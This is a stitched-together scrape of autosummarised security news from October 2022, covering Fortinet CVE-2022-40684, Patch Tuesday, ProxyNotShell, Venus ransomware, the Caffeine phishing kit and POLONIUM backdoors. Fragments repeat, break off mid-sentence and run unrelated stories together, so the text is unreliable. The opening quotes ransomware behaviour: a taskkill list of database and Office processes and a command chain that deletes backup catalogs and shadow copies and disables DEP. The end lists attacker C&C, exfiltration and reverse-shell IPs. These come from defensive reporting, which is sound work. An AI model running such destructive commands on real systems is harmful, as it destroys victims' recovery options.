taskkill, msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, mydesktopqos.exe, agntsvc.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, sqlservr.exe, thebat64.exe, thunderbird.exe, winword.exe, wordpad.exe The ransomware will also delete event logs, Shadow Copy Volumes, and disable Data Execution Prevention using the following command: wbadmin delete catalog -quiet && vssadmin.exe delete shadows /all /quiet && bcdedit.exe /set {current} nx AlwaysOff && wmic SHADOWCOPY DELETE When encrypting files, the ransomware will append the .venus extension, as shown below. "Autosummary:
"Autosummary:
"Autosummary:
On the same day, a proof of concept (PoC) was added to the Metasploit framework, enabling even low-skilled hackers to launch effective attacks against vulnerable servers. "According to a recent eEnergy report, 30 per cent of all purchased energy in the UK is currently wasted in commercial buildings, warehouses and education facilities. Whilst that’s quite a shocking number, it is, unfortunately, no surprise, as the majority of existing buildings in UK cities were constructed without energy efficiency as a key priority. Many UK organizations have started taking decarbonisation goals much more seriously, but there is still a long way to go, … More
The post Smart buildings may be your cybersecurity downfall appeared first on Help Net Security.
"Autosummary:
The adoption of security solutions that integrate IT, OT, and IoT is essential for gaining a complete view of environments within building automation systems, as they provide continuous monitoring and guard against vulnerabilities, threats, and anomalies within the automation environment. "Malwarebytes launched Malwarebytes Managed Detection and Response (MDR), which combines EDR technology and human-delivered security expertise to provide 24/7 threat hunting, monitoring, and response. Amid a shortage of skilled cybersecurity professionals, many organizations lack the time and expertise to monitor and validate security alerts around-the-clock. Teams also struggle to fully utilize the forensics and threat hunting tools provided by EDR platforms and can miss identifying hidden threats before they become infections. Without the time for … More
The post Malwarebytes MDR enables organizations to prioritize critical alerts and detect advanced malware attacks appeared first on Help Net Security.
"Autosummary:
"Tanium launched Tanium Benchmark, a solution that delivers real-time, holistic assessments of the security and operational risks associated with connected endpoints, empowering teams to prioritize efforts, collaborate effectively, and take risk-mitigation action while reducing IT costs and complexity. Benchmark, powered by the Tanium XEM platform, determines real-time risk scores by analyzing up-to-date, comprehensive data from millions of endpoints across Tanium’s global customer base. Benchmark compares a customer’s endpoint metrics against their industry peers to establish … More
The post Tanium Benchmark allows IT teams to track the current state of endpoints appeared first on Help Net Security.
"Autosummary:
"BAE Systems has released the Viper Memory Loader Verifier II (MLV II), a new version of a maintenance capability that will reduce vulnerability to cyberattacks for F-16 aircraft. “Our first generation Viper MLV has 20 years of proven reliability and durability in challenging flight line environments,” said Carl Huncharek, F-16 product line director for BAE Systems. “This new version of the product will include cyber-hardened aircraft mission capabilities, with an open system architecture that reduces … More
The post BAE Systems Viper MLV II reduces F-16 aircraft vulnerability to cyberattacks appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Trellix released global research revealing the cost of siloed security, weak spots in protection, and lack of confidence amongst security operations teams. This Help Net Security video uncovers how unsustainable the situation is for cybersecurity professionals today.
The post Cybersecurity pros opine on the future of security appeared first on Help Net Security.
"Autosummary:
"Experts released the PoC exploit code for the authentication bypass flaw CVE-2022-40684 in FortiGate firewalls and FortiProxy web proxies. A proof-of-concept (PoC) exploit code for the authentication bypass vulnerability CVE-2022-40684 (CVSS score: 9.6) in FortiGate firewalls and FortiProxy web proxies has been released online. The vulnerability impacts FortiOS versions from 7.0.0 to 7.0.6 and from […]
The post Experts released PoC exploit code for critical bug CVE-2022-40684 in Fortinet products appeared first on Security Affairs.
"Autosummary:
Linkedin Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
"Horizon3.ai researchers have released a PoC exploit for CVE-2022-40684, the authentication bypass vulnerability affecting Fortinet‘s firewalls and secure web gateways, and soon after exploitation attempts started rising. “[On Thursday], the Wordfence Threat Intelligence team began tracking exploit attempts targeting CVE-2022-40684 on our network of over 4 million protected websites,” Wordfence threat analyst Ram Gall shared. They have recorded several exploit attempts and requests from over 20 IP addresses, but most of those were attempts to … More
The post Researchers release PoC for Fortinet firewall flaw, exploitation attempts mount appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
Your goal is to emerge from these programs with a working knowledge of the following concepts: Networking architecture and design Networking, routing and switching hardware and systems Firewalls and packet sniffing systems Threat detection and analysis methods Common network and software vulnerability types Earn One or More Cybersecurity Certifications The next thing you"ll need to do is to earn one or more cybersecurity certifications to demonstrate your abilities to would-be employers. Prepare Your Freelance Business Once you"ve got enough experience and have a solid resume of small freelance cybersecurity jobs under your belt, you"ll be ready to turn your hard work into a standalone freelance business. The Takeaway The simple fact is, the sheer volume of open cybersecurity jobs — and the countless more that will appear in the next few years — make your odds of success as a freelance cybersecurity analyst quite high.Since you"ll be marketing your skills and reputation as a cybersecurity analyst, the site doesn"t need to be anything more than a professional-looking portal with your business name, basic information, and contact details. "Autosummary:
"Autosummary:
"[Base record] contains the symbol tables that store information on the various client, container and security contexts associated with the Base Log File, as well as accounting information on these," according to Alex Ionescu, chief architect at Crowdstrike. "Autosummary:
Contributors and those who provided new ransomware information and stories this week include: @struppigel, @VK_Intel, @serghei, @BleepinComputer, @billtoulas, @LawrenceAbrams, @malwareforme, @demonslay335, @FourOctets, @jorntvdw, @PolarToffee, @Ionut_Ilascu, @Seifreed, @fwosar, @malwrhunterteam, @DanielGallagher, @AuCyble, @UID_, @linuxct, @MsftSecIntel, @ahnlab, @Amermelsad, @TrendMicro, and @pcrisk. October 12th 2022 As previously shared, upon discovering the ransomware attack, we took immediate steps to protect our systems, contain the incident, begin an investigation, and ensure continuity of care. "Autosummary:
Heavy congestion combined with a low fee caused the Bitcoin blockchain to take much longer to confirm a transaction, allowing the Police to make a transaction, receive the key, and immediately cancel their bitcoin transaction. "This month"s Patch Tuesday update from Microsoft deals with 84 flaws and a zero-day affecting Microsoft Exchange that at the moment remains unresolved. The Windows updates focus on Microsoft security and networking components with a difficult-to-test update to COM and OLE db. And Microsoft browsers get 18 updates—nothing critical or urgent.
Autosummary:
Each month, we break down the update cycle into product families (as defined by Microsoft) with the following basic groupings: Browsers (Microsoft IE and Edge); Microsoft Windows (both desktop and server); Microsoft Office; Microsoft Exchange; Microsoft Development platforms ( ASP.NET Core, .NET More generally, given the broad nature of this update (Office and Windows), we suggest testing the following Windows features and components: A GDI update (GDIPLUS.DLL) requires testing of EMF , both 16- and 32-bit palette files (opening, printing, and creating). Unless otherwise specified, we should now assume each Patch Tuesday update will require testing core printing functions, including: printing from directly connected printers; large print jobs from servers (especially if they are also domain controllers); remote printing (using RDP and VPN). Key testing scenarios Given the large number of changes included this month, I have broken down the testing scenarios into high-risk and standard-risk groups: High Risk: For October, Microsoft has not recorded any high-risk functionality changes.Though all four vulnerabilities (CVE-2022-41032, CVE-2022-41032, CVE-2022-41034 and CVE-2022-41083) have standard entries in the Microsoft Security Update Guide (MSUG), the Visual Studio team has also published these 17.3 Release notes. "Researchers disclosed details of a now-patched flaw, tracked as CVE-2022-37969, in Windows Common Log File System (CLFS). The CVE-2022-37969 (CVSS score: 7.8) flaw is a Windows Common Log File System Driver Elevation of Privilege Vulnerability. The Common Log File System (CLFS) is a general-purpose logging subsystem that can be used by applications running in both kernel mode […]
The post Experts disclose technical details of now-patched CVE-2022-37969 Windows Zero-Day appeared first on Security Affairs.
"Autosummary:
“On September 2, 2022, Zscaler Threatlabz captured an in-the-wild 0-day exploit in the Windows Common Log File System Driver (CLFS.sys) and reported this discovery to Microsoft.” "This month"s Patch Tuesday update from Microsoft deals with 84 flaws and a zero-day affecting Microsoft Exchange that at the moment remains unresolved. The Windows updates focus on Microsoft security and networking components with a difficult-to-test update to COM and OLE db. And Microsoft browsers get 18 updates—nothing critical or urgent.
Autosummary:
Each month, we break down the update cycle into product families (as defined by Microsoft) with the following basic groupings: Browsers (Microsoft IE and Edge); Microsoft Windows (both desktop and server); Microsoft Office; Microsoft Exchange; Microsoft Development platforms ( ASP.NET Core, .NET More generally, given the broad nature of this update (Office and Windows), we suggest testing the following Windows features and components: A GDI update (GDIPLUS.DLL) requires testing of EMF , both 16- and 32-bit palette files (opening, printing, and creating). Unless otherwise specified, we should now assume each Patch Tuesday update will require testing core printing functions, including: printing from directly connected printers; large print jobs from servers (especially if they are also domain controllers); remote printing (using RDP and VPN). Key testing scenarios Given the large number of changes included this month, I have broken down the testing scenarios into high-risk and standard-risk groups: High Risk: For October, Microsoft has not recorded any high-risk functionality changes.Though all four vulnerabilities (CVE-2022-41032, CVE-2022-41032, CVE-2022-41034 and CVE-2022-41083) have standard entries in the Microsoft Security Update Guide (MSUG), the Visual Studio team has also published these 17.3 Release notes. "Portnox released a cloud-native IoT security solution to help mid-market and enterprise businesses address rising Internet of Things (IoT) security threats. Now available via the Portnox Cloud, Portnox’s new IoT fingerprinting and profiling capabilities empower organizations to identify, authenticate, authorize, and segment IoT devices across their network to ensure an effective zero trust security posture. “No organization is immune to the inherent and increasing number of security risks IoT devices pose as they are more … More
The post Portnox unveils IoT fingerprinting and profiling solution to address rising IoT security threats appeared first on Help Net Security.
"Autosummary:
Large enterprises are not alone when it comes to rising IoT security headaches – organizations of all sizes are actively trying to strengthen their security postures to account for the surge of threats tied to the rising operational dependence on IoT. With so many IoT devices – printers, cameras, thermostats, sensors, monitors, etc. – now in use across all types of organizations, the ability to automatically onboard and enforce IoT device authentication, control and security policies across the network is mission critical. "Skybox Security announced the next generation of its Security Posture Management Platform – including a Software-as-a-Service (SaaS) solution for Security Policy and Vulnerability Management. Propelling its global customer base into the next era of proactive cybersecurity, major innovations advance its platform that continuously tests attack feasibility, exposure, remediation options, and compliance across hybrid environments. “Today, we’re delivering on our mission of building the world’s leading Security Posture Management platform,” said Skybox Security CEO and Founder … More
The post Skybox Security introduces SaaS solution for Security Policy and Vulnerability Management appeared first on Help Net Security.
"Autosummary:
“Executives and board members want to know if their cybersecurity teams are staying ahead of the latest celebrity malware such as TrickBot, REMCOS, FormBook, AZORult, Ursnif, Agent Tesla, and NanoCore,” said Ran Abramson, Threat Intelligence Analyst, Skybox Research Lab.Building on its Exposure Management process that emphasizes publicly known vulnerabilities and identifies control gaps, Skybox now also associates vulnerabilities to malware by name, category, and distinct classes – including ransomware, Remote Access Trojans (RATs), botnets, cryptocurrency miners, trojans, and more. Expansion into Cyber Asset Attack Surface Management Challenging the status quo through a dynamic, fresh approach to Cyber Asset Attack Surface Management (CAASM), Skybox visualizes all assets through API integrations, identifies and prioritizes vulnerabilities using proprietary threat intelligence, sees gaps in security controls, and automatically provides remediation options. : Manage security policies, prioritize vulnerabilities, and remediate exposures across the most complex on-premises, cloud, operational technology (OT), and hybrid environments. "Kaspersky researchers warn of a recently discovered malicious version of a popular WhatsApp messenger mod dubbed YoWhatsApp. Kaspersky researchers discovered an unofficial WhatsApp Android application named ‘YoWhatsApp’ that steals access keys for users’ accounts. Mod apps are advertised as unofficial versions of legitimate apps that have features that the official one does not supports. YoWhatsApp is […]
The post YoWhatsApp, unofficial WhatsApp Android app spreads the Triada Trojan appeared first on Security Affairs.
"Autosummary:
To stay safe, the researchers recommend: Only installing applications from official stores and reliable resources Remembering to check which permissions you give installed applications – some of them can be very dangerous Installing a reliable mobile antivirus on your smartphone, such as Kaspersky Internet Security for Android. "Fortifying cybersecurity defenses remains a work in progress for many organizations, who acknowledge their shortcomings but have yet to commit the necessary resources to the effort, according to new research from CompTIA. This Help Net Security video uncovers how cybersecurity is becoming more tightly integrated with business objectives.
The post Fear of cybercriminals drives cybersecurity improvements appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
Those who want to verify if their devices have already been compromised before applying mitigations or patches can check the devices" logs for user=" Local_Process_Access", user_interface=" Node.js", or user_interface=" Report Runner". "Autosummary:
For the recent on, it switched to JavaScript files that had the following names: SYSTEM.Critical.Upgrade.Win10.0.ba45bd8ee89b1.js SYSTEM.Security.Database.Upgrade.Win10.0.jse Antivirus_Upgrade_Cloud.29229c7696d2d84.jse ALERT.System.Software.Upgrade.392fdad9ebab262cc97f832c40e6ad2c.js These files are obfuscated and use a variation of the "DotNetToJScript" technique to execute a .NET file in the system memory, lowering the risk of detection by antivirus products available on the host. "Categories: Business With Malwarebytes MDR, our team of cybersecurity professionals acts as an extension to your security team. |
The post Introducing Malwarebytes Managed Detection and Response (MDR) appeared first on Malwarebytes Labs.
"Autosummary:
EDR (including Brute Force Protection) and Cloud Security Modules Threat intelligence feeds from multiple sources ingested Premium external threat feeds Internal Malwarebytes feeds including crowd-sourced intelligence from the entire Malwarebytes customer base (B2B and Consumer) Open-source feeds Telemetry data and threat intelligence correlated with alert Generates additional context to the alert (e.g., more clues to the behavior and origin) The MDR Analyst Team monitors endpoint alerts 24x7 to field incoming alerts: Artifacts of alert rapidly reviewed and prioritized for triage Automations sift through the artifacts (processes, actions, etc) to identify most interesting Case opened on each artifact requiring triage Notification provided to customer within MDR Portal Case analyzed by MDR Analyst team Deep analysis and review leveraging enriched alerts Escalation to Tier 3 analysts, 2nd opinions within the team ‘Best course of action’ decided and communicated MDR Analysts communicate one of two possible decisions via the customer portal: Customer verification of artifact required Remediation required Then comes the options for remediation: Malwarebytes managed Malwarebytes automatically provides remediation by removing threats using EDR capabilities Re-boot, re-imaging, and other onsite tasks will require customer involvement Collaborative Malwarebytes notifies customer who can authorize managed remediation or perform remediation themselves Work together to take care of it outside of biz hours, etc Manual (customer does it, guidance from MWB) "SonicWall released the 2022 SonicWall Threat Mindset Survey which found that 66% of customers are more concerned about cyberattacks in 2022, with the main threat being focused on financially motivated attacks like ransomware. “No one is safe from cyberattacks — businesses or individuals,” said SonicWall Executive Chairman of the Board Bill Conner. “Today’s business landscape requires persistent digital trust to exist. Supply-chain attacks have dramatically changed the attack surface of the typical enterprise in the … More
The post For most companies ransomware is the scariest of all cyberattacks appeared first on Help Net Security.
"Autosummary:
Additional findings: Rising concerns about escalating cyberattacks : There is growing concern regarding cyberattacks amongst 66% of organizations surveyed; ransomware leads the distress as 91% of all customers cited it as their biggest concern. "We already have cybersecurity behaviors we learned from elsewhere, especially those who have grown up with technology. Initially, cybersecurity starts from home and school, and it is very hard nowadays to exist without some sort of online presence. When it comes to cybersecurity within organizations, employees tend to prioritize and focus on productivity rather than security. It is important to act on cybersecurity vulnerabilities within the IT system, but organizations should also strengthen the defenses … More
The post How to improve employees’ cybersecurity behavior appeared first on Help Net Security.
"Autosummary:
"In the past decade, digital transformation has become a buzzword in nearly every industry. Organizations have scaled down workforces in favor of automation, moved their servers and networks off-premises, and transferred their data to the cloud, but mostly kept to their old ways when thinking about cybersecurity. But things are finally changing, and the idea of cyber resilience is taking hold as an extension (or enhancement) of traditional business continuity (BC) and disaster recovery (DR) … More
The post Are your cybersecurity investments making you less resilient? appeared first on Help Net Security.
"Autosummary:
You’ve spent years securing your use of, and access to, SaaS providers with things like SSO, MFA, only allowing access from allowed IPs, etc.But even so, in the case of big companies, rebuilding machines, infrastructure, customer environments, and more takes time and money.When everything is running smoothly, of course, everything seems “critical” to the business, but when faced with a major security event that requires rebuilding, you simply can’t get everything back at the same time. "Lockbit ransomware affiliates are compromising Microsoft Exchange servers to deploy their ransomware, experts warn. South-Korean cybersecurity firm AhnLab reported that Lockbit ransomware affiliates are distributing their malware via compromised Microsoft Exchange servers. In July 2022, two servers operated by a customer of the security firm were infected with LockBit 3.0 ransomware. Threat actors initially deployed […]
The post LockBit affiliates compromise Microsoft Exchange servers to deploy ransomware appeared first on Security Affairs.
"Autosummary:
So far I"ve only skimmed a translated version of the page, but what evidence is provided that it"s a different vulnerability? — Will Dormann (@wdormann) October 11, 2022 Bleeping Computer pointed out that at least three vulnerabilities in Microsoft Exchange, discovered by Zero Day Initiative vulnerability researcher Piotr Bazydlo, have yet to be patched. "Autosummary:
The type of information that may be exposed are Credit card information Financial information Social security numbers Driver"s license numbers Health insurance details Healthcare Industry is the Prime Target of Cyberattacks The Omnicell Data Breach was not the only cyber-attack targeting healthcare institutions. Omnicell Announced Data Breach Founded in 1992, Omnicell is a leading provider of medication management solutions for hospitals, long-term care facilities, and retail pharmacies. "Autosummary:
"Autosummary:
Three other elevation of privilege vulnerabilities of note relate to Windows Hyper-V (CVE-2022-37979, CVSS score: 7.8), Active Directory Certificate Services (CVE-2022-37976, CVSS score: 8.8), and Azure Arc-enabled Kubernetes cluster Connect (CVE-2022-37968, CVSS score: 10.0). "Autosummary:
First page of the phishing form (INKY) This includes their Google account credentials, SSNs, EINs, State ID and driver’s license details, and bank account number. "Autosummary:
"Autosummary:
The caller, who purports to be a support agent for the bank, instructs the individual, on the other hand, to install a security app and grant it extensive permissions, when, in reality, it"s malicious software intended to gain remote access or conduct financial fraud. "Fraudsters use various tactics to separate people from their hard-earned cash on Zelle. Here’s how to keep your money safe while using the popular P2P payment service.
The post How scammers target Zelle users – and how you can stay safe appeared first on WeLiveSecurity
"Autosummary:
A new breed of apps, including Venmo, Cash App and Zelle, now offer a fast, effective and free way for users to pay friends, family and selected small businesses. If it’s not already enabled, add two-factor authentication to your banking or Zelle app, which will mean that even if scammers get hold of passwords and usernames, they won’t be able to hijack the account.Enhance authentication: If it’s not already enabled, add two-factor authentication to your banking or Zelle app, which will mean that even if scammers get hold of passwords and usernames, they won’t be able to hijack the account. Indeed, just days ago, Zelle came under fire in a US Senate report, which stated that Zelle users lost some $440 million through fraudulent transactions in 2021.Or they may pretend to be a representative from a government agency, bank, utility or similar, demanding funds to cover a late payment or fine.Consider the following: Be skeptical: Never send money to anyone you don’t trust, and remember that if an offer seems too good to be true, it usually is. "Autosummary:
"Stairwell announced a $45M Series B capitalization. The funding round was led by Section 32, with additional investments from Sequoia Capital, Accel, Lux Capital, Gradient Ventures, and angel investors Eric Schmidt and Michael Ovitz. This brings Stairwell’s total funding to date to $69.5 million as it looks to scale its flagship product, Inception, to become continuous intelligence, detection, and response solution available. “New vulnerabilities are discovered daily, and continuous monitoring, threat hunting, and response are … More
The post Stairwell raises $45 million to secure organizations against emerging malware threats appeared first on Help Net Security.
"Autosummary:
“The power and advanced capabilities of the Inception platform are clear to customers and partners, and it’s rare to find a company with such a strong combination of product, engineering, customer focus, and executive leadership.”, Harrison continued. "Categories: News Tags: HMRC Tags: UKGOV Tags: tax Tags: return Tags: phish Tags: fake Tags: scam Tags: refund Tags: rebate Be on your guard for scammers offering fake rebates |
The post UK government sounds alarm on tax scams appeared first on Malwarebytes Labs.
"Autosummary:
The department responsible for tax in the UK, known as HMRC, has this to say: In the 12 months to August 2022, HMRC responded to more than 180,000 referrals of suspicious contact from the public, of which almost 81,000 were scams offering fake tax rebates. During tax season, a wave of bogus emails, texts, and even phone calls, can find their way into your workspace as you arrange your receipts and spreadsheets. "Categories: Exploits and vulnerabilities Categories: News Tags: Microsoft Tags: Apple Tags: Google Tags: Android Tags: Samsung Tags: Xiaomi Tags: Adobe Tags: SAP Tags: VMWare Tags: Fortinet Tags: CVE-2022-41033 Tags: CVE-2022-41040 Tags: zero-day No fix for ProxyNotShell |
The post Update now! October patch Tuesday fixes actively used zero-day...but not the one you expected appeared first on Malwarebytes Labs.
"Autosummary:
What wasn’t fixed The Exchange Server "ProxyNotShell" vulnerabilities, CVE-2022-41040 and CVE-2022-41082, were not fixed in this round of updates. "Categories: Business Detecting ransomware can be tricky. Attackers use obfuscation and evasion techniques to avoid detection, and new ransomware variants are produced every day. In this post, we look at five ransomware detection techniques and their pros and cons. |
The post Top 5 ransomware detection techniques: Pros and cons of each appeared first on Malwarebytes Labs.
"Autosummary:
Pros: Can detect ransomware that static engines do not catch Fewer false positives than previously mentioned dynamic techniques Cons: High CPU utilization on the endpoint Files will be encrypted until a level of confidence is reached, so not all damage is blocked Bypass by encrypting only part of the file, or by encrypting in chunks. Pros: Low false positive rate Effective against common ransomware No damage is done Cons: Trivial to bypass; ransomware with a new extension will manage to encrypt It can be difficult to find a file-monitoring solution that has a extension blacklist feature 3. Pros: Low false positive rate Effective against known ransomware Can stop attacks before execution so no files are encrypted Cons: Time consuming if conducted manually Can be bypassed easily using Packers / Crypters or by simply replacing characters with digits or special characters 2. Cons: Some false positives, as programs and users may touch the bait files Files will be encrypted until ransomware touches the decoy files Bypass by skipping hidden files/folders, or by targeting specific folders 4. "Attacks against governments are nothing new. They have been an interesting target since they have existed, for the mere reason that not everyone agrees on how things are run. In this Help Net Security video, David Masson, Director of Enterprise Security at Darktrace, illustrates how the attack surface is getting bigger by the day. Due to the enormous quantity of data government organizations need to protect, the challenges faced by their security teams are significant. … More
The post How government organizations can stay steps ahead of attackers appeared first on Help Net Security.
"Autosummary:
"In this interview for Help Net Security, Immanuel Chavoya, Threat Detection Expert at SonicWall, talks about phishing-as-a-service (PaaS), the risks it can pose to organization, and what to do to tackle this threat. Phishing-as-a-service has become a growing threat to organizations. How exactly does this trend work? Phishing attacks have only grown with the rise of SaaS in the workplace, and even the most security-savvy worker can be duped into a phishing attack. Phishing-as-a-service is … More
The post Cybercriminals are having it easy with phishing-as-a-service appeared first on Help Net Security.
"Autosummary:
In this interview for Help Net Security, Immanuel Chavoya, Threat Detection Expert at SonicWall, talks about phishing-as-a-service (PaaS), the risks it can pose to organization, and what to do to tackle this threat. Instead of threat actors being required to have technical knowledge of building or taking over infrastructure to host a phishing kit (login page emulating known login interfaces like Facebook/Amazon/Netflix/OWA), the barrier to entry is significantly lowered with the introduction of PaaS. Last year, a large-scale SaaS campaign, marketed by criminals as BulletProofLink was exposed by Microsoft, finding more than 300,000 newly created and unique subdomains. "Autosummary:
"California-based Resecurity has identified a new spike of underground services enabling bad actors to generate deepfakes. According to cybersecurity experts, this may be used for political propaganda, foreign influence activity, disinformation, scams, and fraud. Introduced by Canadian researchers to the public in 2014, Generative Adversarial Networks (GANs), typically imitate people’s faces, speech, and unique facial […]
The post DeepFakes Are The Cybercriminal Economy’s Latest Business Line appeared first on Security Affairs.
"Autosummary:
"Autosummary:
Since September 2021, the hackers have used at least seven variants of custom backdoors, including four new undocumented backdoors known as "TechnoCreep", "FlipCreep", "MegaCreep",, and "PapaCreep." "After privately warning customers last week that they need to patch or mitigate CVE-2022-40684, a critical vulnerability affecting FortiOS, FortiProxy, and FortiSwitchManager, Fortinet has finally confirmed that it “is aware of an instance where this vulnerability was exploited.” But their advice to organizations to immediately check their systems for a specific indicator of compromise makes it sound like they believe more widespread attacks have happened or are happening. About CVE-2022-40684 CVE-2022-40684 is an authentication bypass … More
The post Auth bypass bug in FortiOS, FortiProxy is exploited in the wild (CVE-2022-40684) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
It requires users to create an account, and buy a subscription that costs $250 a month (Basic), $450 for three months (Professional), or $850 for a six-month license (Enterprise) to avail its wide range of services, including the campaign management dashboard and the tools to configure the attacks. "Autosummary:
"Autosummary:
Windows 11 KB5018427 cumulative update Windows 11 users can install today"s update by going to Start > Settings > Windows Update and clicking on "Check for Updates." "Autosummary:
The number of bugs in each vulnerability category is listed below: 39 Elevation of Privilege Vulnerabilities 2 Security Feature Bypass Vulnerabilities 20 Remote Code Execution Vulnerabilities 11 Information Disclosure Vulnerabilities 8 Denial of Service Vulnerabilities 4 Spoofing Vulnerabilities The above counts do not include twelve vulnerabilities fixed in Microsoft Edge on October 3rd. "Autosummary:
"There is a possibility that the vulnerabilities of Microsoft Exchange Server (CVE-2022-41040, CVE-2022-41082) disclosed by GTSC, a Vietnamese security company, on September 28 were used, but the attack method, the generated WebShell file name, and subsequent attacks after WebShell creation," AhnLab says. "October 2022 Patch Tuesday is here, with fixes for 85 CVE-numbered vulnerabilities, including CVE-2022-41033, a vulnerability in Windows COM+ Event System Service that has been found being exploited in the wild. But, first and foremost, it should be noted that the two MS Exchange zero-days under active exploitation (CVE-2022-41040 and CVE-2022-41082, aka ProxyNotShell) have still not been patched, and administrators must make do with Microsoft’s guidance on how to mitigate them until the fixes are … More
The post Microsoft patches Windows flaw exploited in the wild (CVE-2022-41033) appeared first on Help Net Security.
"Autosummary:
But, first and foremost, it should be noted that the two MS Exchange zero-days under active exploitation (CVE-2022-41040 and CVE-2022-41082, aka ProxyNotShell) have still not been patched, and administrators must make do with Microsoft’s guidance on how to mitigate them until the fixes are ready. "Autosummary:
"Researchers warn of a new phishing-as-a-service (PhaaS) toolkit, called Caffeine, which is being used by cybercriminals. In March 2022, Mandiant researchers discovered threat actors using a shared Phishing-as-a-Service (PhaaS) platform called Caffeine. The experts noticed that the toolkit has an intuitive interface and supports multiple features that allow customers to easily arrange phishing campaigns. The service […]
The post Caffeine, a new Phishing-as-a-Service toolkit available in the underground appeared first on Security Affairs.
"Autosummary:
The report published by Mandiant provides details about the main elements of the Caffeine Phishing Platform, which are: Core Caffeine account Licensing Campaign infrastructure and configuration “It is also important to keep in mind that defensive measures against PhaaS attacks can be a game of cat and mouse. "Resistant AI and ComplyAdvantage launched their solution for fighting financial crime across the U.S. and Europe. Financial crime is a multi-trillion-dollar problem. According to the United Nations, the estimated amount of money laundered globally in one year is 2 – 5% of global GDP, or 800 billion – 2 trillion US dollars. While the cost of fraud and money laundering to financial organizations and other businesses is significant, the cost and damage to economies and … More
The post Resistant AI and ComplyAdvantage launch AI-driven solution to combat financial crime appeared first on Help Net Security.
"Autosummary:
Adding Resistant AI’s capabilities to ComplyAdvantage’s transaction risk monitoring platform extends anti-money laundering (AML) and anti-fraud protections offered to financial institutions and other businesses by: Enabling them to detect previously unknown patterns of behavior and identify new risks faster. "Cyware has appointed Willy Leichter as Vice President of Marketing, Jeff Bell as Director of Demand Generation, and Mark Bermingham as Director of Product Marketing. In their new roles, Willy, Jeff, and Mark will expand the company’s marketing capabilities. In its quest to solve the automation, threat intelligence, and security collaboration challenges for security teams globally, Willy, Jeff, and Mark will help Cyware to grow its reach and generate demand by increasing its marketing programs. … More
The post Cyware hires three industry experts to increase its marketing programs appeared first on Help Net Security.
"Autosummary:
Serving numerous large Enterprises, MSSPs, and ISACs across the globe, Cyware is poised to lead the creation of next-gen security infrastructure through its diverse all-star team, extensive partner ecosystem, loyal clientele, and industry-leading products. "Categories: News Tags: scam Tags: fake Tags: fraud Tags: phish Tags: romance Tags: 419 Tags: astronaut Tags: space Tags: station Tags: shuttle Tags: rocket Tags: fake Tags: email We take a look at a scam which has come around every couple of years and which has finally claimed a sizable bounty from a victim. |
The post An 18 year scam odyssey of stranded astronauts appeared first on Malwarebytes Labs.
"Autosummary:
Instead of flood, famine, and the death of Kings, it brings confusion, some level of hilarity, and a slice of sheer disbelief.This is because he claimed his cousin, Abacha Tunde, was stranded on a secret Soviet military space station via the Soyuz, which would typically be one of its flights to and from the International Space Station.It’s now 2010, and Dr. Bakare Tunde is still asking for help to get his cousin, Abacha Tunde, returned to Earth. "Categories: News Tags: Bank Tags: awareness Tags: campaign Tags: never say that Tags: security Tags: phish Tags: phishing We take a look at an awareness campaign based around the kind of thing you should never hear your bank saying. |
The post Security awareness campaign highlights things your bank will never say appeared first on Malwarebytes Labs.
"Autosummary:
Scoping out the scams The incredibly colourful Banks Never Ask That is a collection of tips focused on four key areas of phishing danger: text messages, mobile payment app scams, email, and phone calls. If you like anti-phishing efforts, hashtags, and confusing but colourful video games, you’ll be interested to know that a security initiative involving all three is now live. Very rarely, scammers will claim that a bank’s site is being updated, or replaced, and moved to a new URL. The rest of the site focuses on specific areas of security related to locking down accounts, using multi-factor authentication, insisting on calling back a bank directly instead of taking a random caller’s word for it and so on. "ESET researchers analyzed previously undocumented custom backdoors and cyberespionage tools deployed in Israel by the POLONIUM APT group
The post POLONIUM targets Israel with Creepy malware appeared first on WeLiveSecurity
"Autosummary:
DYV Tunnels module Network IP First seen Details 37.120.233[.]89 2022-09-12 PapaCreep C&C 45.80.148[.]119:8080 2022-05-21 Reverse shell server 45.80.148[.]167:21 45.80.148[.]167:5055 2021-11-27 Exfiltration 45.80.148[.]186:8080 2022-01-08 Reverse shell server 45.80.149[.]22:8080 2022-05-13 CreepySnail C&C 45.80.149[.]108:8080 2022-02-11 CreepySnail C&C 45.80.149[.]68:63047 2022-03-01 CreepySnail C&C 45.80.149[.]71:80 2022-03-11 CreepySnail C&C 185.244.129[.]79:63047 2022-03-01 CreepySnail C&C 45.80.149[.]154:1302 45.80.149[.]154:21 2021-09-23 TechnoCreep C&C Exfiltration 185.244.129[.]216:5055 2021-11-24 Exfiltration 146.70.86[.]6:1433 2022-05-26 Exfiltration 195.166.100[.]23:5055 2022-01-05 Exfiltration 45.137.148[.]7:2121 2021-10-29 FlipCreep C&C 185.203.119[.]99:8080 2022-02-12 Reverse Shell 212.73.150[.]174 2022-02-24 Tunneling 94.156.189[.]103 2022-04-20 Tunneling 51.83.246[.]73 2022-03-12 Tunneling MITRE ATT&CK techniques This table was built using version 11 of the MITRE ATT&CK framework. As shown in Figure 1, POLONIUM’s toolset consists of seven custom backdoors: CreepyDrive, which abuses OneDrive and Dropbox cloud services for C&C; CreepySnail, which executes commands received from the attackers’ own infrastructure; DeepCreep and MegaCreep, which make use of Dropbox and Mega file storage services respectively; and FlipCreep, TechnoCreep, and PapaCreep, which receive commands from attacker’s servers.Some of the most interesting characteristics of the group’s toolset are: Abundance of tools : We have seen seven different custom backdoors used by the group since September 2021, and also saw many other malicious modules for logging keystrokes, taking screenshots, executing commands, taking photos with the webcam, or exfiltrating files.Verticals targeted by this group include engineering, information technology, law, communications, branding and marketing, media, insurance, and social services. : We have seen seven different custom backdoors used by the group since September 2021, and also saw many other malicious modules for logging keystrokes, taking screenshots, executing commands, taking photos with the webcam, or exfiltrating files.In the example, two 